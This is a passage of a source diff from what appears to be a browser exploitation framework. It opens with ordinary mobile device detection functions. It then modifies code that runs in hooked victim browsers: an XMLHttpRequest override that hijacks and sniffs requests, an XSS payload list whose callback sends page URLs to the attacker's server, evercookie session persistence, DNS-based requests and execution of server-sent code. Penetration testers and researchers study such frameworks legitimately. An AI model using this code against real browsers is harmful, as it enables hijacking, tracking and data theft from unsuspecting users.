+      if (DetectIpad() || DetectIpod())
+         return false;
+      else
+         return true;
+   }
+   else
+      return false;
+}
+
+function DetectIpod()
+{
+   if (uagent.search(deviceIpod) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectIpad()
+{
+   if (uagent.search(deviceIpad) > -1  && DetectWebkit())
+      return true;
+   else
+      return false;
+}
+
+function DetectIphoneOrIpod()
+{
+   if (uagent.search(deviceIphone) > -1 ||
+       uagent.search(deviceIpod) > -1)
+       return true;
+    else
+       return false;
+}
+
+function DetectIos()
+{
+   if (DetectIphoneOrIpod() || DetectIpad())
+      return true;
+   else
+      return false;
+}
+
+function DetectAndroid()
+{
+   if ((uagent.search(deviceAndroid) > -1) || DetectGoogleTV())
+      return true;
+   if (uagent.search(deviceHtcFlyer) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectAndroidPhone()
+{
+   if (DetectAndroid() && (uagent.search(mobile) > -1))
+      return true;
+   if (DetectOperaAndroidPhone())
+      return true;
+   if (uagent.search(deviceHtcFlyer) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectAndroidTablet()
+{
+   if (!DetectAndroid())
+      return false;
+
+   if (DetectOperaMobile())
+      return false;
+   if (uagent.search(deviceHtcFlyer) > -1)
+      return false;
+
+   if (uagent.search(mobile) > -1)
+      return false;
+   else
+      return true;
+}
+
+
+function DetectAndroidWebKit()
+{
+   if (DetectAndroid() && DetectWebkit())
+      return true;
+   else
+      return false;
+}
+
+
+function DetectGoogleTV()
+{
+   if (uagent.search(deviceGoogleTV) > -1)
+      return true;
+   else
+      return false;
+}
+
+
+function DetectWebkit()
+{
+   if (uagent.search(engineWebKit) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectS60OssBrowser()
+{
+   if (DetectWebkit())
+   {
+     if ((uagent.search(deviceS60) > -1 ||
+          uagent.search(deviceSymbian) > -1))
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+function DetectSymbianOS()
+{
+   if (uagent.search(deviceSymbian) > -1 ||
+       uagent.search(deviceS60) > -1 ||
+       uagent.search(deviceS70) > -1 ||
+       uagent.search(deviceS80) > -1 ||
+       uagent.search(deviceS90) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectWindowsPhone7()
+{
+   if (uagent.search(deviceWinPhone7) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectWindowsMobile()
+{
+   if (DetectWindowsPhone7())
+      return false;
+   if (uagent.search(deviceWinMob) > -1 ||
+       uagent.search(deviceIeMob) > -1 ||
+       uagent.search(enginePie) > -1)
+      return true;
+   if ((uagent.search(devicePpc) > -1) &&
+       !(uagent.search(deviceMacPpc) > -1))
+      return true;
+   if (uagent.search(manuHtc) > -1 &&
+       uagent.search(deviceWindows) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerry()
+{
+   if (uagent.search(deviceBB) > -1)
+      return true;
+   if (uagent.search(vndRIM) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerryTablet()
+{
+   if (uagent.search(deviceBBPlaybook) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerryWebKit()
+{
+   if (DetectBlackBerry() &&
+       uagent.search(engineWebKit) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerryTouch()
+{
+   if (DetectBlackBerry() &&
+        ((uagent.search(deviceBBStorm) > -1) ||
+        (uagent.search(deviceBBTorch) > -1) ||
+        (uagent.search(deviceBBBoldTouch) > -1) ||
+        (uagent.search(deviceBBCurveTouch) > -1) ))
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerryHigh()
+{
+   if (DetectBlackBerryWebKit())
+      return false;
+   if (DetectBlackBerry())
+   {
+     if (DetectBlackBerryTouch() ||
+        uagent.search(deviceBBBold) > -1 ||
+        uagent.search(deviceBBTour) > -1 ||
+        uagent.search(deviceBBCurve) > -1)
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+function DetectBlackBerryLow()
+{
+   if (DetectBlackBerry())
+   {
+     if (DetectBlackBerryHigh() || DetectBlackBerryWebKit())
+        return false;
+     else
+        return true;
+   }
+   else
+      return false;
+}
+
+
+function DetectPalmOS()
+{
+   if (uagent.search(devicePalm) > -1 ||
+       uagent.search(engineBlazer) > -1 ||
+       uagent.search(engineXiino) > -1)
+   {
+     if (DetectPalmWebOS())
+        return false;
+     else
+        return true;
+   }
+   else
+      return false;
+}
+
+function DetectPalmWebOS()
+{
+   if (uagent.search(deviceWebOS) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectWebOSTablet()
+{
+   if (uagent.search(deviceWebOShp) > -1 &&
+       uagent.search(deviceTablet) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectGarminNuvifone()
+{
+   if (uagent.search(deviceNuvifone) > -1)
+      return true;
+   else
+      return false;
+}
+
+
+function DetectSmartphone()
+{
+   if (DetectIphoneOrIpod()
+      || DetectAndroidPhone()
+      || DetectS60OssBrowser()
+      || DetectSymbianOS()
+      || DetectWindowsMobile()
+      || DetectWindowsPhone7()
+      || DetectBlackBerry()
+      || DetectPalmWebOS()
+      || DetectPalmOS()
+      || DetectGarminNuvifone())
+      return true;
+
+   return false;
+};
+
+function DetectArchos()
+{
+   if (uagent.search(deviceArchos) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBrewDevice()
+{
+   if (uagent.search(deviceBrew) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectDangerHiptop()
+{
+   if (uagent.search(deviceDanger) > -1 ||
+       uagent.search(deviceHiptop) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectMaemoTablet()
+{
+   if (uagent.search(maemo) > -1)
+      return true;
+   if ((uagent.search(linux) > -1)
+       && (uagent.search(deviceTablet) > -1)
+       && !DetectWebOSTablet()
+       && !DetectAndroid())
+      return true;
+   else
+      return false;
+}
+
+function DetectSonyMylo()
+{
+   if (uagent.search(manuSony) > -1)
+   {
+     if (uagent.search(qtembedded) > -1 ||
+         uagent.search(mylocom2) > -1)
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+function DetectOperaMobile()
+{
+   if (uagent.search(engineOpera) > -1)
+   {
+     if (uagent.search(mini) > -1 ||
+         uagent.search(mobi) > -1)
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+function DetectOperaAndroidPhone()
+{
+   if ((uagent.search(engineOpera) > -1) &&
+      (uagent.search(deviceAndroid) > -1) &&
+      (uagent.search(mobi) > -1))
+      return true;
+   else
+      return false;
+}
+
+function DetectOperaAndroidTablet()
+{
+   if ((uagent.search(engineOpera) > -1) &&
+      (uagent.search(deviceAndroid) > -1) &&
+      (uagent.search(deviceTablet) > -1))
+      return true;
+   else
+      return false;
+}
+
+function DetectSonyPlaystation()
+{
+   if (uagent.search(devicePlaystation) > -1)
+      return true;
+   else
+      return false;
+};
+
+function DetectNintendo()
+{
+   if (uagent.search(deviceNintendo) > -1   ||
+	uagent.search(deviceWii) > -1 ||
+	uagent.search(deviceNintendoDs) > -1)
+      return true;
+   else
+      return false;
+};
+
+function DetectXbox()
+{
+   if (uagent.search(deviceXbox) > -1)
+      return true;
+   else
+      return false;
+};
+
+function DetectGameConsole()
+{
+   if (DetectSonyPlaystation())
+      return true;
+   if (DetectNintendo())
+      return true;
+   if (DetectXbox())
+      return true;
+   else
+      return false;
+};
+
+function DetectKindle()
+{
+   if (uagent.search(deviceKindle) > -1 &&
+       !DetectAndroid())
+      return true;
+   else
+      return false;
+}
+
+function DetectAmazonSilk()
+{
+   if (uagent.search(engineSilk) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectMobileQuick()
+{
+   if (DetectTierTablet())
+      return false;
+
+   if (DetectSmartphone())
+      return true;
+
+   if (uagent.search(deviceMidp) > -1 ||
+	DetectBrewDevice())
+      return true;
+
+   if (DetectOperaMobile())
+      return true;
+
+   if (uagent.search(engineNetfront) > -1)
+      return true;
+   if (uagent.search(engineUpBrowser) > -1)
+      return true;
+   if (uagent.search(engineOpenWeb) > -1)
+      return true;
+
+   if (DetectDangerHiptop())
+      return true;
+
+   if (DetectMaemoTablet())
+      return true;
+   if (DetectArchos())
+      return true;
+
+   if ((uagent.search(devicePda) > -1) &&
+        !(uagent.search(disUpdate) > -1))
+      return true;
+   if (uagent.search(mobile) > -1)
+      return true;
+
+   if (DetectKindle() ||
+       DetectAmazonSilk())
+      return true;
+
+   return false;
+};
+
+
+function DetectMobileLong()
+{
+   if (DetectMobileQuick())
+      return true;
+   if (DetectGameConsole())
+      return true;
+   if (DetectSonyMylo())
+      return true;
+
+   if (uagent.search(manuSamsung1) > -1 ||
+	uagent.search(manuSonyEricsson) > -1 ||
+	uagent.search(manuericsson) > -1)
+      return true;
+
+   if (uagent.search(svcDocomo) > -1)
+      return true;
+   if (uagent.search(svcKddi) > -1)
+      return true;
+   if (uagent.search(svcVodafone) > -1)
+      return true;
+
+
+   return false;
+};
+
+
+function DetectTierTablet()
+{
+   if (DetectIpad()
+        || DetectAndroidTablet()
+        || DetectBlackBerryTablet()
+        || DetectWebOSTablet())
+      return true;
+   else
+      return false;
+};
+
+function DetectTierIphone()
+{
+   if (DetectIphoneOrIpod())
+      return true;
+   if (DetectAndroidPhone())
+      return true;
+   if (DetectBlackBerryWebKit() && DetectBlackBerryTouch())
+      return true;
+   if (DetectWindowsPhone7())
+      return true;
+   if (DetectPalmWebOS())
+      return true;
+   if (DetectGarminNuvifone())
+      return true;
+   else
+      return false;
+};
+
+function DetectTierRichCss()
+{
+    if (DetectMobileQuick())
+    {
+       if (DetectTierIphone() || DetectKindle())
+          return false;
+
+       if (DetectWebkit())
+          return true;
+       if (DetectS60OssBrowser())
+          return true;
+
+       if (DetectBlackBerryHigh())
+          return true;
+
+       if (DetectWindowsMobile())
+          return true;
+
+       if (uagent.search(engineTelecaQ) > -1)
+          return true;
+
+       else
+          return false;
+    }
+    else
+      return false;
+};
+
+function DetectTierOtherPhones()
+{
+    if (DetectMobileLong())
+    {
+       if (DetectTierIphone() || DetectTierRichCss())
+          return false;
+
+       else
+          return true;
+    }
+    else
+      return false;
+};
+
+
+function InitDeviceScan()
+{
+    isIphone = DetectIphoneOrIpod();
+    isAndroidPhone = DetectAndroidPhone();
+    isTierIphone = DetectTierIphone();
+    isTierTablet = DetectTierTablet();
+
+    isTierRichCss = DetectTierRichCss();
+    isTierGenericMobile = DetectTierOtherPhones();
+};
+
+InitDeviceScan()

core/main/client/logger.js

@@ -50,6 +50,7 @@ beef.logger = {
 	 */
 	start: function() {
 
+		beef.browser.hookChildFrames();
 		this.running = true;
 		var d = new Date();
 		this.time = d.getTime();

core/main/client/mitb.js

@@ -14,47 +14,30 @@ beef.mitb = {
         beef.mitb.cid = cid;
         beef.mitb.curl = curl;
         /*Override open method to intercept ajax request*/
-        var xml_type;
+        var hook_file = "<%= @hook_file %>";
 
         if (window.XMLHttpRequest && !(window.ActiveXObject)) {
 
-            xml_type = 'XMLHttpRequest';
-        }
-
-        if (xml_type == "XMLHttpRequest") {
             beef.mitb.sniff("Method XMLHttpRequest.open override");
             (function (open) {
-                XMLHttpRequest.prototype.open = function (method, url, async, user, pass) {
-
-                    var portRegex = new RegExp(":[0-9]+");
-                    var portR = portRegex.exec(url);
-                    /*return :port*/
-                    var requestPort;
-
-                    if (portR != null) {
-                        requestPort = portR[0].split(":");
-                    }
-
-                    if ((user == "beef") && (pass == "beef")) {
-                        /*a poisoned something*/
-                        open.call(this, method, url, async, null, null);
-                    }
-
-
-                    else if (url.indexOf("hook.js") != -1 || url.indexOf("/dh?") != -1) {
-                        /*a beef hook.js polling or dh */
-                        open.call(this, method, url, async, null, null);
-                    }
-
-                    else {
+                XMLHttpRequest.prototype.open = function (method, url, async, mitb_call) {
+                    // Ignore it and don't hijack it. It's either a request to BeEF (hook file or Dynamic Handler)
+                    // or a request initiated by the MiTB itself.
+                    if (mitb_call || (url.indexOf(hook_file) != -1 || url.indexOf("/dh?") != -1)) {
+                        open.call(this, method, url, async, true);
+                    }else {
+                        var portRegex = new RegExp(":[0-9]+");
+                        var portR = portRegex.exec(url);
+                        var requestPort;
+                        if (portR != null) { requestPort = portR[0].split(":")[1]; }
 
+                        //GET request
                         if (method == "GET") {
+                            //GET request -> cross-domain
                             if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
                                 beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
                                 window.open(url);
-
-                            }
-                            else {
+                            }else { //GET request -> same-domain
                                 beef.mitb.sniff("GET [Ajax Request]: " + url);
                                 if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
                                     var title = "";
@@ -63,26 +46,19 @@ beef.mitb = {
                                     } else {
                                         title = document.getElementsByTagName("title")[0].innerHTML;
                                     }
-                                    /*write the url of the page*/
+                                    // write the url of the page
                                     history.pushState({ Be:"EF" }, title, url);
-
                                 }
-
                             }
-
-                        }
-                        else {
-                            /*if we are here we have an ajax post req*/
-                            beef.mitb.sniff("Post ajax request to: " + url);
-                            open.call(this, method, url, async, user, pass);
-
+                        }else{
+                            //POST request
+                            beef.mitb.sniff("POST ajax request to: " + url);
+                            open.call(this, method, url, async, true);
                         }
                     }
                 };
             })(XMLHttpRequest.prototype.open);
-
         }
-
     },
 
     // Initializes the hook on anchors and forms.
@@ -161,7 +137,7 @@ beef.mitb = {
     fetchForm:function (url, query, target) {
         try {
             var y = new XMLHttpRequest();
-            y.open('POST', url, false, "beef", "beef");
+            y.open('POST', url, false, true);
             y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
             y.onreadystatechange = function () {
                 if (y.readyState == 4 && y.responseText != "") {
@@ -181,14 +157,13 @@ beef.mitb = {
     fetch:function (url, target) {
         try {
             var y = new XMLHttpRequest();
-            y.open('GET', url, false, "beef", "beef");
+            y.open('GET', url, false, true);
             y.onreadystatechange = function () {
                 if (y.readyState == 4 && y.responseText != "") {
-
                     target.innerHTML = y.responseText;
                     setTimeout(beef.mitb.hook, 10);
                 }
-            }
+            };
             y.send(null);
             beef.mitb.sniff("GET: " + url);
             return true;
@@ -204,7 +179,7 @@ beef.mitb = {
         try {
             var target = document.getElementsByTagName("html")[0];
             var y = new XMLHttpRequest();
-            y.open('GET', url, false, "beef", "beef");
+            y.open('GET', url, false, true);
             y.onreadystatechange = function () {
                 if (y.readyState == 4 && y.responseText != "") {
                     var title = "";
@@ -223,11 +198,9 @@ beef.mitb = {
             beef.mitb.sniff("GET: " + url);
 
         } catch (x) {
-
-
+            // the link is cross-domain, so load the resource in a different tab
             window.open(url);
             beef.mitb.sniff("GET [New Window]: " + url);
-
         }
     },
 

core/main/client/net/dns.js

@@ -43,7 +43,7 @@ beef.net.dns = {
 
 		// sends a DNS request
 		sendQuery = function(query) {
-			//console.log("Requesting: "+query);
+			beef.debug("Requesting: "+query);
 			var img = new Image;
 			img.src = "http://"+query;
 			img.onload = function() { dom.removeChild(this); }

core/main/client/net/xssrays.js

@@ -49,22 +49,20 @@ beef.net.xssrays = {
     //browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
     vectors: [
 
-//				  {input:"',XSS,'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"\',XSS,\'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'\'><script>XSS<\/script>', name: 'Standard script injection single quote', browser: 'ALL',url:true,form:true,path:true},
-				  {input:'"><script>XSS<\/script>', name: 'Standard script injection double quote', browser: 'ALL',url:true,form:true,path:true}, //,
-//				  {input:'\'><body onload=\'XSS\'>', name: 'body onload single quote', browser: 'ALL',url:true,form:true,path:true},
-				  {input:'"><body onload="XSS">', name: 'body onload double quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'"><script>XSS<\/script>', name: 'Standard script injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'"><body onload="XSS">', name: 'body onload', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
-//				  {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true},
+				  {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
   				  {input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
@@ -107,7 +105,7 @@ beef.net.xssrays = {
     // util function. Print string to the console only if the debug flag is on and the browser is not IE.
     printDebug:function(log) {
         if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) {
-            console.log("[XssRays] " + log);
+            beef.debug("[XssRays] " + log);
         }
     },
 
@@ -340,8 +338,8 @@ beef.net.xssrays = {
                         beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
                         beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
 
-                        beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                            + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                        beefCallback = "location='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+                            + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
 
                         exploit = vector.input.replace(/XSS/g, beefCallback);
 
@@ -368,7 +366,7 @@ beef.net.xssrays = {
                 beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
 
                 beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                    + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                    + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
 
                 exploit = vector.input.replace(/XSS/g, beefCallback);
 
@@ -424,7 +422,7 @@ beef.net.xssrays = {
                         beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
 
                         beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                            + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                            + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
 
                         exploit = beef.net.xssrays.escape(vector.input.replace(/XSS/g, beefCallback));
                         form += '<textarea name="' + i + '">' + exploit + '<\/textarea>';

core/main/client/os.js

@@ -7,9 +7,9 @@
 beef.os = {
 
 	ua: navigator.userAgent,
-	
+
 	isWin311: function() {
-		return (this.ua.indexOf("Win16") != -1) ? true : false;
+		return (this.ua.match('(Win16)')) ? true : false;
 	},
 	
 	isWinNT4: function() {
@@ -19,18 +19,25 @@ beef.os = {
 	isWin95: function() {
 		return (this.ua.match('(Windows 95)|(Win95)|(Windows_95)')) ? true : false;
 	},
+	isWinCE: function() {
+		return (this.ua.match('(Windows CE)')) ? true : false;
+	},
 	
 	isWin98: function() {
 		return (this.ua.match('(Windows 98)|(Win98)')) ? true : false;
 	},
 	
 	isWinME: function() {
-		return (this.ua.indexOf('Windows ME') != -1) ? true : false;
+		return (this.ua.match('(Windows ME)|(Win 9x 4.90)')) ? true : false;
 	},
 	
 	isWin2000: function() {
 		return (this.ua.match('(Windows NT 5.0)|(Windows 2000)')) ? true : false;
 	},
+
+	isWin2000SP1: function() {
+		return (this.ua.match('Windows NT 5.01 ')) ? true : false;
+	},
 	
 	isWinXP: function() {
 		return (this.ua.match('(Windows NT 5.1)|(Windows XP)')) ? true : false;
@@ -47,6 +54,10 @@ beef.os = {
 	isWin7: function() {
 		return (this.ua.match('(Windows NT 6.1)|(Windows NT 7.0)')) ? true : false;
 	},
+
+	isWin8: function() {
+		return (this.ua.match('(Windows NT 6.2)')) ? true : false;
+	},
 	
 	isOpenBSD: function() {
 		return (this.ua.indexOf('OpenBSD') != -1) ? true : false;
@@ -103,19 +114,26 @@ beef.os = {
 	isBeOS: function() {
 		return (this.ua.match('BeOS')) ? true : false;
 	},
+
+	isWindows: function() {
+		return this.isWin311() || this.isWinNT4() || this.isWinCE() || this.isWin95() || this.isWin98() || this.isWinME() || this.isWin2000() || this.isWin2000SP1() || this.isWinXP() || this.isWinServer2003() || this.isWinVista() || this.isWin7() || this.isWin8() || this.isWinPhone();
+	},
 	
 	getName: function() {
-		//windows
-		if(this.isWin311()) return 'Windows 3.11';
-		if(this.isWinNT4()) return 'Windows NT 4';
-		if(this.isWin95()) return 'Windows 95';
-		if(this.isWin98()) return 'Windows 98';
-		if(this.isWinME()) return 'Windows Millenium';
-		if(this.isWin2000()) return 'Windows 2000';
-		if(this.isWinXP()) return 'Windows XP';
+		//Windows
+		if(this.isWin311())        return 'Windows 3.11';
+		if(this.isWinNT4())        return 'Windows NT 4';
+		if(this.isWinCE())         return 'Windows CE';
+		if(this.isWin95())         return 'Windows 95';
+		if(this.isWin98())         return 'Windows 98';
+		if(this.isWinME())         return 'Windows Millenium';
+		if(this.isWin2000())       return 'Windows 2000';
+		if(this.isWin2000SP1())    return 'Windows 2000 SP1';
+		if(this.isWinXP())         return 'Windows XP';
 		if(this.isWinServer2003()) return 'Windows Server 2003';
-		if(this.isWinVista()) return 'Windows Vista';
-		if(this.isWin7()) return 'Windows 7';
+		if(this.isWinVista())      return 'Windows Vista';
+		if(this.isWin7())          return 'Windows 7';
+		if(this.isWin8())          return 'Windows 8';
 
 		//Nokia
 		if(this.isNokia()) {

core/main/client/session.js

@@ -13,7 +13,8 @@ beef.session = {
 	
 	hook_session_id_length: 80,
 	hook_session_id_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",	
-	ec: new evercookie(),	
+	ec: new evercookie(),
+    beefhook: "<%= @hook_session_name %>",
 	
 	/**
 	 * Gets a string which will be used to identify the hooked browser session
@@ -22,12 +23,12 @@ beef.session = {
 	 */
   	get_hook_session_id: function() {
 		// check if the browser is already known to the framework
-		var id = this.ec.evercookie_cookie("BEEFHOOK");
+		var id = this.ec.evercookie_cookie(beef.session.beefhook);
 		if (typeof id == 'undefined') {
-			var id = this.ec.evercookie_userdata("BEEFHOOK");
+			var id = this.ec.evercookie_userdata(beef.session.beefhook);
 		}
 		if (typeof id == 'undefined') {
-			var id = this.ec.evercookie_window("BEEFHOOK");
+			var id = this.ec.evercookie_window(beef.session.beefhook);
 		}
 		
 		// if the browser is not known create a hook session id and set it
@@ -47,9 +48,9 @@ beef.session = {
 	 */
   	set_hook_session_id: function(id) {
 		// persist the hook session id
-		this.ec.evercookie_cookie("BEEFHOOK", id);
-		this.ec.evercookie_userdata("BEEFHOOK", id);
-		this.ec.evercookie_window("BEEFHOOK", id);
+		this.ec.evercookie_cookie(beef.session.beefhook, id);
+		this.ec.evercookie_userdata(beef.session.beefhook, id);
+		this.ec.evercookie_window(beef.session.beefhook, id);
 	},
 	
 	/**

core/main/client/updater.js

@@ -15,6 +15,7 @@ beef.updater = {
 	
 	// XHR-polling timeout.
     xhr_poll_timeout: "<%= @xhr_poll_timeout %>",
+    beefhook: "<%= @hook_session_name %>",
 	
 	// A lock.
 	lock: false,
@@ -57,7 +58,7 @@ beef.updater = {
 	get_commands: function() {
 		try {
 			this.lock = true;
-            beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
+            beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, beef.updater.beefhook+'='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
                 if (response.body != null && response.body.length > 0)
                     beef.updater.execute_commands();
             });

core/main/client/websocket.js

@@ -53,9 +53,10 @@ beef.websocket = {
         };
 
         this.socket.onmessage = function (message) {
-            //todo: double-check if there is a way to don't use eval here. It's not a big deal,
-            //todo: because the eval'ed data comes from BeEF itself, so is implicitly trusted.
-            eval(message.data);
+            // Data coming from the WebSocket channel is either of String, Blob or ArrayBufferdata type.
+            // That's why it needs to be evaluated first. Using Function is a bit better than pure eval().
+            // It's not a big deal anyway, because the eval'ed data comes from BeEF itself, so it is implicitly trusted.
+            new Function(message.data)();
         };
 
         this.socket.onclose = function () {

core/main/constants/hardware.rb

@@ -12,6 +12,8 @@ module Constants
   module Hardware
 
     HW_UNKNOWN_IMG        = 'pc.png'
+	HW_VM_IMG             = 'vm.png'
+	HW_LAPTOP_IMG         = 'laptop.png'
 	HW_IPHONE_UA_STR      = 'iPhone'
  	HW_IPHONE_IMG         = 'iphone.jpg'
 	HW_IPAD_UA_STR	      = 'iPad'
@@ -32,8 +34,8 @@ module Constants
 	HW_HTC_IMG            = 'htc.ico'
 	HW_MOTOROLA_UA_STR    = 'motorola'
 	HW_MOTOROLA_IMG       = 'motorola.png'
-	HW_GOOGLE_UA_STR      = 'Nexus One'
-	HE_GOOGLE_IM          = 'nexus.png'
+	HW_GOOGLE_UA_STR      = 'Nexus'
+	HW_GOOGLE_IMG         = 'nexus.png'
 	HW_ERICSSON_UA_STR    = 'Ericsson'
 	HW_ERICSSON_IMG       = 'sony_ericsson.png'
 	HW_ALL_UA_STR         = 'All'

core/main/handlers/browserdetails.rb

@@ -68,6 +68,7 @@ module BeEF
                       }
           zombie.httpheaders = @http_headers.to_json
           zombie.save
+          #puts "HTTP Headers: #{zombie.httpheaders}"
 
           # add a log entry for the newly hooked browser
           BeEF::Core::Logger.instance.register('Zombie', "#{zombie.ip} just joined the horde from the domain: #{log_zombie_domain}:#{log_zombie_port.to_s}", "#{zombie.id}")
@@ -79,6 +80,56 @@ module BeEF
             self.err_msg "Invalid browser name returned from the hook browser's initial connection."
           end
 
+          # detect browser proxy
+          using_proxy = false
+          [
+            'CLIENT_IP',
+            'FORWARDED_FOR',
+            'FORWARDED',
+            'FORWARDED_FOR_IP',
+            'PROXY_CONNECTION',
+            'PROXY_AUTHENTICATE',
+            'X_FORWARDED',
+            'X_FORWARDED_FOR',
+            'VIA'
+          ].each do |header|
+            unless JSON.parse(zombie.httpheaders)[header].nil?
+              using_proxy = true
